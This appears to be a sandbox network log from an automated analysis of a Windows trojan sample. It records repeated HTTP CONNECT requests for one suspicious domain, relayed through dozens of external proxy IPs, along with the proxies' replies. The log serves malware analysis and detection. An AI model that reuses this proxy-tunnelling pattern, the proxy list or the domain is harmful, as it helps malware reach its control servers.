                                                                                1621192.168.2.851025202.5.16.44805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.047307968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.811347961 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1622192.168.2.850920222.124.29.5956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.048865080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1623192.168.2.85477279.110.197.14480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.049060106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1624192.168.2.851019103.180.194.14680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.056760073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.530591011 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1625192.168.2.854779185.54.0.1841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.057524920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1626192.168.2.85472213.234.24.11610805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.059030056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.344862938 CET147INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.45
                                                                                Server: squid/4.14
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1627192.168.2.85485151.210.45.148603595828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.073268890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.548099041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1628192.168.2.85474285.172.60.20211815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.073736906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1629192.168.2.85483141.111.187.214805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.073983908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1630192.168.2.85483651.83.135.3528465828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.074956894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1631192.168.2.85469847.74.226.850015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.075222015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1632192.168.2.854456222.255.238.159805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.135585070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.494164944 CET506INHTTP/1.1 302 Found
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Location: https://ktxcomay.com.vn
                                                                                Content-Length: 314
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1633192.168.2.854325117.160.250.16399905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.136547089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.179409981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.195333958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.194818974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:03.194861889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:15.194716930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:27.194711924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1634192.168.2.85470427.147.24.20580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.136570930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.805382013 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1635192.168.2.854815143.208.152.6131805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.137191057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.695029974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398433924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.757488012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.398118019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.038363934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1636192.168.2.85485631.43.33.5541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.137415886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1637192.168.2.85476159.125.232.28805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.216605902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1638192.168.2.85475034.64.4.17805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.216917992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.617523909 CET1286INHTTP/1.1 404 Not Found
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Referrer-Policy: no-referrer
                                                                                Content-Length: 1561
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32
                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2
                                                                                Feb 23, 2024 14:28:39.617532015 CET430INData Raw: 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63
                                                                                Data Ascii: ){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1639192.168.2.85456572.195.114.16941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.222686052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1640192.168.2.854744103.166.141.74200745828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.223015070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.608227968 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1641192.168.2.854841102.132.50.4980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.311117887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1642192.168.2.85485851.68.164.7780955828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.312335968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.194890022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382675886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.492131948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1643192.168.2.850104178.249.218.3456785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.312516928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1644192.168.2.854817223.112.53.210255828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.312841892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.290271044 CET34INHTTP/1.1 503 Service Unavailable


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1645192.168.2.854820103.49.202.250805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.313344002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1646192.168.2.85486220.219.180.10531295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.313350916 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:39.662065983 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1647192.168.2.85425745.11.95.16560085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.322942972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1648192.168.2.85370150.62.134.139369165828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.388539076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.491942883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.494322062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.507441998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1649192.168.2.854867106.105.218.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.391120911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
